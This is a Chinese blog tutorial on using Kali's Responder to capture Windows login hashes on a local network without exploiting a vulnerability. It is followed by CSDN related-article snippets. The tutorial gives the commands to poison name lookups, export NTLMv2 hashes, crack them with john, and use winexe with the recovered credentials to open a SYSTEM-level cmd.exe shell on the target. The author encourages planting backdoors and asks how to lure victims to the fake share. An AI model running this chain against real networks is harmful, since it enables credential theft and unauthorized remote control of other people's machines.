不利用系统漏洞拿shell,kali强大工具Responder

最新推荐文章于 2023-09-20 00:13:26 发布
最新推荐文章于 2023-09-20 00:13:26 发布
阅读量1.5k 收藏 12
点赞数 1
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39815966/article/details/109139328
版权

这是一种不用通过漏洞利用来获取权限的一种方法,使用的是kali的一个工具,叫Responder,主要是通过监听网络,有人如果访问了虚假的共享文件地址,就会获得该系统登录口令的哈希值,然后再通过脚本进行hash爆破就可以获取口令,再通过ipc建立空连接获得系统权限。

我们的第一步当然是获取该工具喽,非常的简单,只要从github上下载即可,
当然首先你先需要安装一下python环境和git工具

# apt-get intall build-essential git python-dev

然后是直接从git上克隆到本地

# git clone https://github.com/lgandx/Responder.git

等他下载完成然后需要进行一下更新(如果存在更新的话)

# cd Respondder/

#git pull

会出现一个
Already up-to-date(以更新到最新)

然后我们就可以使用啦!

ok,那我们开始正文!

那些什么-h啥的就不废话了,不会有人真的不知道吧

首先我们启动一个内网监听(需要先cd到responder文件夹下)

# ./Responder.py -wf -I eth0

在这里插入图片描述

-wf 应该是设定web代理 -I 指定网卡,这里我指定的是eth0,我们可以通过ifconfig指令查看自己的ip以及网卡信息,具体怎么添加删除一个网卡这里不再赘述,scdn一搜一大堆

如下图,开始监听了。

然后我们在任何windows系统访问一下虚假的共享文件地址,

<******>\\NOTAREALHOST\NOTARALSHARE\notarealfile.exe

会出现拒绝访问
然后我们的监听端就会出现一些奇妙的信息。

在这里插入图片描述

没错,我们抓到了我们的登录口令hash
然后我们q退出,运行

./DumpHash.py

在这里插入图片描述

会把我们抓到的hash导出成john可以处理的格式

这里我们抓到了两个hash,一个是我本机的登录口令,一个是我的虚拟机windows server 2012R2的登录口令hash
我们的根目录会生成两个txt文件,分别存储的是两个版本的hash,具体是什么版本在我们上一步导出时已经明确指出,如上图:时NTLMV2版本。
在这里插入图片描述

然后我们用我们的john进行指定版本hash爆破,爆破并不是百分百成功的。

john DumpNTLMv2.txt

在这里插入图片描述

现在我们能做的只有等。。。

获取到口令之后我们能干的事情就太多了,看22端口开了嘛,开了直接ssh连接,或者还有更强的,验证目标系统上是否存在ipc共享,如下:

smbclient -U [username]%[password] -L [ipaddress]

在这里插入图片描述

ok可以清楚的看到它开着,然后我们直接用kali自带工具winexe拿shell

winexe -U [username]%[password] --uninstall \\[ipaddress] cmd.exe

或者直接给他提升系统权限

winexe -U [username]%[password] --uninstall --system \\[ipaddress] cmd.exe

注意一定要带参数–unistall 不然会留下你的大猪蹄子的哦
在这里插入图片描述

直接就是系统权限,该留后门留后门,该干嘛干嘛就完事了,一次愉快的旅程,*但是有个问题,怎么诱导它访问共享文件呢?that is a question。 *

Mast3ry
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali工具使用.pdf
09-14
kali工具使用.pdf
kali系统-工具-中文手册-html版
07-15
Kali Linux Tools 中文說明書 nmap包说明 NMAP(“网络映射”)是一个自由和开放源码(许可证)工具进行网络发现和安全审计。许多系统和网络管理员也觉得有用,如网络库存,管理服务升级计划和监控主机或服务的正常运行时间的任务。 NMAP使用原始IP包以新颖的方式来确定哪些主机是在网络上可用,这些主机正在提供什么样的服务(应用程序的名称和版本),什么操作系统(和OS版本),它们都在运行,什么类型的分组过滤器/防火墙在使用中,和许多其他特性。它的目的是快速扫描大型网络,但能正常工作对单个主机。 Nmap的运行在所有主要计算机操作系统,和官方的二进制软件包可用于Linux,Windows和Mac OS X的除了经典的命令行Nmap的可执行文件,nmap的套件包括一个先进的GUI和结果浏览器(Zenmap)一种灵活的数据传送,重定向和调试工具(NCAT),用于比较扫描结果(Ndiff)的实用程序,并且一个分组产生和响应分析工具(Nping)。 Nmap的被评为“年度安全产品”,由Linux杂志,信息世界,LinuxQuestions.Org和Codetalker摘要。有人甚至功能十二电影,包括重装上阵,虎胆龙威4,女孩龙纹身,和谍影重重。 Nmap是比较合适? 灵活:支持数十台先进的技术映射出网络充满了IP过滤,防火墙,路由器和其他障碍。这包括许多端口扫描机制(包括TCP和UDP),操作系统检测,版本检测,ping扫描,等等。请参阅文档页面。 功能强大:Nmap的已被用来扫描字面上机数十万庞大的网络。 便携性:大多数操作系统都支持,包括Linux,微软的Windows,FreeBSD下,OpenBSD系统,Solaris和IRIX,Mac OS X中,HP-UX,NetBSD的,SUN OS,Amiga的,等等。 很简单:虽然Nmap的提供了一套丰富的先进功能的电力用户,你可以开始作为简称为“NMAP -v -A targethost”。这两种传统的命令行和图形(GUI)版本可供选择,以满足您的喜好。二进制文件是为那些谁不希望从源代码编译的Nmap。 免费:在Nmap的项目的主要目标是帮助使互联网更安全一点,并为管理员提供/审计/黑客探索他们的网络的先进工具。 NMAP是可以免费下载,并且还配备了完整的源代码,你可以修改,并根据许可协议的条款重新分发。 有据可查:重大努力已投入全面和最新的手册页,白皮书,教程,甚至一整本书!发现他们在这里多国语言。 支持:虽然Nmap的同时没有担保,这是深受开发者和用户一个充满活力的社区提供支持。大多数这种相互作用发生在Nmap的邮件列表。大多数的bug报告和问题应该发送到NMAP-dev邮件列表,但你读的指引之后。我们建议所有用户订阅低流量的nmap-黑客公布名单。您还可以找到的Nmap在Facebook和Twitter。对于即时聊天,加入Freenode上或连接到efnet的#nmap通道。 好评:Nmap的赢得了无数奖项,包括“信息安全产品奖”,由Linux杂志,信息世界和Codetalker文摘。它已被刊登在数以百计的杂志文章,几部电影,几十本书,一本漫画书系列。访问进一步的细节新闻页面。 热门:成千上万的人下载Nmap的每一天,它包含许多操作系统(红帽Linux,Debian的Linux中,Gentoo的,FreeBSD下,OpenBSD的,等等)。它是在Freshmeat.Net库的前十名(总分30000)方案之间。这是很重要的,因为它的Nmap借给其充满活力的发展和用户的支持群体。
最新kali之responder
vanony的博客
07-09 671
选项: --version 显示程序的版本号并退出 -h, --help 显示此帮助消息并退出 -A, --analyze 分析模式。 此选项使您无需响应即可查看NBT-NS,BROWSER,LLMNR请求。 -I eth0, --interface=eth0 要使用的网络接口,可以将“ ALL”用作所有接口的通配符 -i 10.0.0.21, --ip=10.0.0.21 要使用的本地IP(仅适用于OSX) -e 10.0.0.22, --externalip=10.0.0.22 使
LLMNR欺骗工具Responder
dengliang7440的博客
03-16 575
LLMNR(Link-Local Multicast Name Resolution,链路本地多播名称解析)协议是一种基于DNS包格式的协议。它可以将主机名解析为IPv4和IPv6的IP地址。这样用户就可以直接使用主机名访问特定的主机和服务,而不用记忆对应的IP地址。该协议被广泛使用在Windows Vista/7/8/10操作系统中。该协议的工作机制很简单。例如,计算机A和计算机B同处...
responder简单用法
qq_44881113的博客
09-08 1332
Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix Responder 是一款可以在局域网模拟各种服务器的内网渗透神器 其可以在局域网中进行 DNS 欺骗、LLMNR 欺骗等,实现对用户 NTLM 口令的探测以及 DNS 钓鱼 同时其还可以模拟包括 FTP、HTTP 在内的多
灰帽黑客(第五版):实验10-1 使用Responder获取口令
lmpwang的博客
08-25 193
宿主机Kali:192.168.43.209虚拟机VirtualBox:网络:桥接网络,使虚拟机和宿主机保持在一个网段系统:win10家庭版系统(初始系统使用virtualbox安装过程默认密码changeme!Responder
Responder
09-20 405
操作系统:Kali Linux 工具:responder,john,evil-winrm PS:输入以下命令解决靶场环境无法打开问题
内网渗透-Responder捕获Win哈希
小刚的博客
08-03 2937
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 Responder捕获Win哈希实验环境Responder安装ResponderResponder参数获取NTLMv2哈希 实验环境 VM搭建的虚拟测试环境 1.被攻击win7主机192.168.1.130 2.kali 192.168.1.131 3.win7配置 netsh advfirewall set allprofiles state off winrm quickconfig winr.
KALI 2020 软件集成清单——嗅探/欺骗(九)
weixin_44024324的博客
04-29 1031
9、嗅探/欺骗 9.1网络欺骗 9.1.1 dnschef 是一个高度可配置的DNS代理,用于渗透测试和恶意软件分析 9.1.2 rebind 可以实现对用户所在网络路由器进行攻击。当用户访问Rebind监听域名,Rebind会自动实施DNS Rebinding攻击,通过用户的浏览器执行js脚本,建立socket连接 9.1.3 sslsplit 作为mid man监听ssl信息及HTTP信息。h...
内网渗透之Responder演练(下)
qq_53058639的博客
08-21 82
NTLM中继攻击已经被发现十多年了,要实现NTLM中继攻击,也需要先进行LLMNR/NBNS欺骗,这样,攻击机器就可以充当了中间人,本质上还是由于NTLM认证机制所导致的,且对于最新的NTLMv2认证任然有效,但这个过程并不是没有限制,对于工作组的机器来说,两台机器的密码需要一致才能成功,对于域用户来说,被欺骗用户(发起请求的用户)需要域管理员组里边的用户才可以,NTLM中继成功后的权限为被欺骗用户的权限。这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。
Kali系统更新后图形页面不能正常启动问题的恢复步骤
09-27
kali linux 系统使用apt-get更新,由于更新失败、更新错误、更新未完成等原因,导致kali系统启动时不能正常启动到图形登录模式。具体恢复步骤见附件。
kali常用工具】MAC地址修改工具 保护终端不暴露
12-16
kali常用工具】MAC地址修改工具 修改终端的Mac地址工具 保护自己的终端信息安全 不暴露
Kali系统工具说明.docx
09-25
文档里是对kali操作系统自带的工具的介绍、选项以及简单的使用说明,尽可能把所有工具都写了进去,常用的工具都做了详细说明(图文并茂),不常用的也做了介绍说明,希望给予大家参考帮助
Hack The Box Starting Point 渗透测试入门靶场 TIER 1 - Responder
Start C的博客
04-19 1132
涉及到SMB,枚举,Apache和WinRM(WinRM是Windows Remote Managementd(win远程管理)的简称。基于Web服务管理(WS-Management)标准,使用80或443端口。这样我们就可以在对方有设置防火墙的情况下远程管理这台服务器) 先看一下旁边的Walkthough,看看本靶场的要求 本实验重点介绍如何利用 Windows 机器上提供的网页上的文件包含漏洞来收集运行 Web 服务器的用户的 NetNTLMv2 质询。我们将使用一个名为 Responder 的实用程
kali linux菜单中各工具功能
n534077的博客
03-11 1096
名称 类型 使用模式 功能 功能评价 dmitry 信息收集 whois查询/子域名收集/端口扫描 whois并不简单明了;子域名和邮箱依赖google;端口扫描速度一般 dnmap 信息收集 用于组建分布式nmap,dnmap_server为服务端;dnmap_client为客户端 用起来并不是那么方便,不是实在不行不是很必要 ike-scan 信息收集 收集ipsec vpn se...
NTLM Relay利用
qq_18811919的博客
03-07 3304
讲述了多种NTLM Relay的利用方式包括打印机bug以及PetitPotam强制触发NTLM认证方式以及Exchange Relay与ADCS Relay的利用
Kali 玩机技巧(杂篇)
辉小鱼的博客
11-03 1959
本文是有关Kali Linux系统的一些简单低级的用法演示,是我个人听课笔记的总结,希望能解决大家的一些问题与困惑!该博文仅限技术学习与交流,若由此发生的一切攻击不法行为,皆与本人无关!
使用Responder获取ntlmv2 hash
whojoe的博客
03-03 1301
使用Responder获取ntlmv2 hashResponder配置下载获取ntlmv2hash之后进行爆破获取ntlmv2使用hashcat爆破密码中继获得shell参考文章 Responder配置 下载 https://github.com/lgandx/Responder Responder工具可以污染LLMNR和NBT-NS请求。 在目录下的Responder.conf可以配置启用的模块 如果只需要获取ntlmv2hash使用默认配置即可,之后使用Hashcat进行暴力破解 如果要使用ntlm中
基于matlab实现人工免疫算法的解决TSP问题的方法
最新发布
05-21
基于matlab实现人工免疫算法的解决TSP问题的方法,体现了免疫算法在进化计算过程中的抗原学习、记忆机制、浓度调节机制以及多样性抗体保持策略等优良特性.rar
80端口漏洞利用kali
04-02
80端口是HTTP协议默认使用的端口,常用于Web服务器。Kali Linux是一款专门用于渗透测试和网络安全的操作系统。在Kali Linux中,有一些工具可以用于检测和利用80端口的漏洞。 其中一个常用的工具是Metasploit Framework,它是一款功能强大的渗透测试工具。Metasploit Framework提供了多个模块,可以用于检测和利用各种漏洞,包括80端口的漏洞。 要利用80端口的漏洞,首先需要进行漏洞扫描,以确定目标系统是否存在漏洞。可以使用Metasploit Framework中的模块进行扫描,例如使用http_version模块来检测目标系统的HTTP版本,或使用http_put模块来检测目标系统是否允许HTTP PUT方法。 如果发现目标系统存在漏洞,可以使用Metasploit Framework中相应的模块进行利用。例如,使用exploit/multi/http/apache_mod_cgi_bash_env_exec模块来利用Apache mod_cgi漏洞,或使用exploit/multi/http/php_cgi_arg_injection模块来利用PHP CGI漏洞。 需要注意的是,利用漏洞是一项高风险的行为,应该在合法授权和合规的情况下进行。未经授权的渗透测试是违行为,可能导致法律责任。在进行渗透时,请确保遵守相关法律法规和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值